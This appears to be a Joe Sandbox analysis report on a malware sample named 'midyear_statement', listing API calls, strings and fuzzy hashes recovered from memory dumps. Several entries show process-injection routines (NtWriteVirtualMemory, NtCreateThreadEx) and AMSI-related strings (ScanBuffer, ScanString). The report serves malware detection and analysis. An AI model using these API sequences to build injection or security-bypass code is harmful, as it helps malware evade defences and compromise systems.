                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                          • Opcode ID: 24956878744e0cf408ac333ce8dc40b9425db7c86dff444b3116ba821e895215
                                                                                                                                                                                          • Instruction ID: 0584f3ea13da8b005e953bac207b7a1cecc09f0377470daac5ea675a1af524fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24956878744e0cf408ac333ce8dc40b9425db7c86dff444b3116ba821e895215
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A022BC0003038AAF8B33EC88C0AAB20B2BFE030C3C8C0E800003E0008E3AE030A220
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,040A1A03,?,040A1FC1), ref: 040A15E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: dfda7fd135facca2c38e7fba3a54f7e56dc5e6f3bea506be10989b6148fed9bb
                                                                                                                                                                                          • Instruction ID: aeda5829a8620af802af46099447330a136b98e1615cb43a4b81825dfef5f1b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: dfda7fd135facca2c38e7fba3a54f7e56dc5e6f3bea506be10989b6148fed9bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF049F07017004FEB05DFB99944B05BBD2EB89348F248139D60AEF788F779A8018B00
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,040A1FC1), ref: 040A16A4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: 9f3f59b308a7e04f41ae6fe9c4d931661085e219b9b3b717c5d814a7bf16aa62
                                                                                                                                                                                          • Instruction ID: ad56d60f71d6037d137126188c8dba506070a5a3ecb3ec6c91476db386b85780
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f3f59b308a7e04f41ae6fe9c4d931661085e219b9b3b717c5d814a7bf16aa62
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0B4B2B04B966BE7119F9A9C80B86FB94FB45318F05413AFA08EB744D778FC108794
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,040A1FE4), ref: 040A1704
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 865aa495fc3cb2490083d447dcb2339103e786948349c5cc106285c8b8d885e5
                                                                                                                                                                                          • Instruction ID: 7bfa287181a8e721cddc6183991cec1bcf062358947c939923148d457d2d2bdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 865aa495fc3cb2490083d447dcb2339103e786948349c5cc106285c8b8d885e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E086753003016FE7105AB95D40F5AABD8EB44658F144476F601EF251D264FC208764
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,04100344,040BC068,ScanString,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanString,04100344,040BC068,UacScan,04100344), ref: 040BA42F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BA435
                                                                                                                                                                                            • Part of subcall function 040A2EE0: QueryPerformanceCounter.KERNEL32 ref: 040A2EE4
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007A,00000000,00000000), ref: 040BA810
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040B7905
                                                                                                                                                                                            • Part of subcall function 040B78F8: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B790B
                                                                                                                                                                                            • Part of subcall function 040B78F8: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040B792B
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BA9AC
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BA9D9
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BAA30
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,04100344,040BC068,ScanString,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanBuffer,04100344,040BC068,OpenSession,04100344), ref: 040BB672
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BB678
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,04100344,040BC068,ScanString,04100344,040BC068,?,?,0000007A,00000000,00000000), ref: 040BB877
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040BB87D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanString,04100344,040BC068,OpenSession,04100344,040BC068,?,?,0000007A,00000000,00000000), ref: 040BBBF4
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,04100344,040BC068,ScanBuffer,04100344,040BC068,ScanBuffer,04100344,040BC068,OpenSession,04100344,040BC068), ref: 040BBD92
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BBDA8
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,0000007A,00000000,00000000), ref: 040BBDAE
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,0000007A,00000000,00000000), ref: 040BBDC6
                                                                                                                                                                                          • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,0000007A,00000000,00000000), ref: 040BBDCC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$AddressModuleProc$CurrentMemoryProcessVirtual$Free$Read$AllocateCloseCounterLibraryLoadPerformanceQuery
                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                                                                                          • API String ID: 4243884105-1854689126
                                                                                                                                                                                          • Opcode ID: 1a714b03e16877bfa88765d8dca16d88dd9382f7206fd5a050206c2d451e4bb0
                                                                                                                                                                                          • Instruction ID: 3a6d3c080f58bc2ed834ec3effca3bb6fcdda39348e7e4f2132b7aee456011ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a714b03e16877bfa88765d8dca16d88dd9382f7206fd5a050206c2d451e4bb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF24338A551198FEB11EBA4DC80FCEB3B9AF4560CF1442A59048BB214DB70FE65CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,040B9DBB,?,?,040B9E4D,00000000,040B9F29), ref: 040B9B48
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 040B9B60
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 040B9B72
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 040B9B84
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 040B9B96
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 040B9BA8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 040B9BBA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 040B9BCC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 040B9BDE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 040B9BF0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 040B9C02
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 040B9C14
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 040B9C26
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 040B9C38
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 040B9C4A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 040B9C5C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 040B9C6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                          • Opcode ID: 64d1cf1153c521a308ba58094162f039fc9487ca691595fc35bbb226a1433c9b
                                                                                                                                                                                          • Instruction ID: 30e1d14eb698a6e12f6f72ffe37b34ee0282f36b0cb0ac5b4fa316c50cc7cf41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d1cf1153c521a308ba58094162f039fc9487ca691595fc35bbb226a1433c9b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA31FFF05406109FEB01EFB5E885BA53BE8EB5A208B054975E180EF205D6BAA890CF5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5895
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 040A58AC
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 040A58DC
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5940
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5976
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A5989
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A599B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000,040CC790), ref: 040A59A7
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4,040A0000), ref: 040A59DB
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,040A72F4), ref: 040A59E7
                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 040A5A09
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                          • Opcode ID: 8fa0fdc54b5f9d15c8b1b455f38d7f04cd53384b200073d1d83e5664b4e3ba02
                                                                                                                                                                                          • Instruction ID: 4ece900ae53d16df1c3826f07bdf1ded6a09d64acd7c37115478d7492ff7ae59
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fa0fdc54b5f9d15c8b1b455f38d7f04cd53384b200073d1d83e5664b4e3ba02
                                                                                                                                                                                          • Instruction Fuzzy Hash: FE416F71E00659BBDB10DEE8CC88ADEB7FCBF48348F0405A5E548FB241E634EA648B50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040A5B58
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 040A5B65
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 040A5B6B
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 040A5B96
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5BDD
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5BED
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 040A5C15
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 040A5C25
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 040A5C4B
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 040A5C5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: 4465b9c049f6acc033b0fe71c1bc8b8fae8fbe916bbec03758855ca2582882af
• Instruction ID: 0b59d7a91c45e09761a3f0d45664a9fc797e3d39b4677c761022c1268bbcd452
• Opcode Fuzzy Hash: 4465b9c049f6acc033b0fe71c1bc8b8fae8fbe916bbec03758855ca2582882af
• Instruction Fuzzy Hash: 88317571E4025C7EFB25D6F49C85BDEB7EC9B04388F0441E1A604FA185E674EF688B50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 040A7F39
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 3261405b2ed2b2ab2c958c9c80080ad853df0981eae5853c2e6ffa55791d3cae
• Instruction ID: 915ff7ba18767d15d81af69b9c54ebc63942807eb104fd37c8487b4e1eafdac9
• Opcode Fuzzy Hash: 3261405b2ed2b2ab2c958c9c80080ad853df0981eae5853c2e6ffa55791d3cae
• Instruction Fuzzy Hash: 6C1112B5E00209AFDB00CF99CC80DEFF7F9FFC8204B54C559A414E7254E671AA018B90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 8652817d83d320707a3fc63be9e7e301e39a0ac90db054d598b7f88b77d66beb
• Instruction ID: e1afdb28e273d1635696ace15060faca84681f5d0fc18d1aaae4606b77d448ec
• Opcode Fuzzy Hash: 8652817d83d320707a3fc63be9e7e301e39a0ac90db054d598b7f88b77d66beb
• Instruction Fuzzy Hash: 3CE0923570021827E710A5A85C80EEAB2AC975C218F04426AA908E7385EDA1ADA086A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32(?,040CB106,00000000,040CB11E), ref: 040AB6DE
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: ae80c64accf660eb26bbc0552008170798e2bd81a51f55580e44455f03b028fa
• Instruction ID: b0db9e9dd890f2059726f6fa985a43fe346870964a83f86563dfed7a884a0a5d
• Opcode Fuzzy Hash: ae80c64accf660eb26bbc0552008170798e2bd81a51f55580e44455f03b028fa
• Instruction Fuzzy Hash: 7BF01779948302CFE350DF68E440E1977E0FB49704F048A38E59CE7380E77CA8158B12
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,040ABDB6,00000000,040ABFCF,?,?,00000000,00000000), ref: 040AA767
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
• Instruction ID: 591b2ccd465284cfcd6dd2d36249e02bc1fb5f23ad5d81de33cbe75f7f1f0b49
• Opcode Fuzzy Hash: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
• Instruction Fuzzy Hash: CED0A76630D2603AF31051AB6D84DBF9AFCCBC66F5F04843AF588D6151E201DC15DB71
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
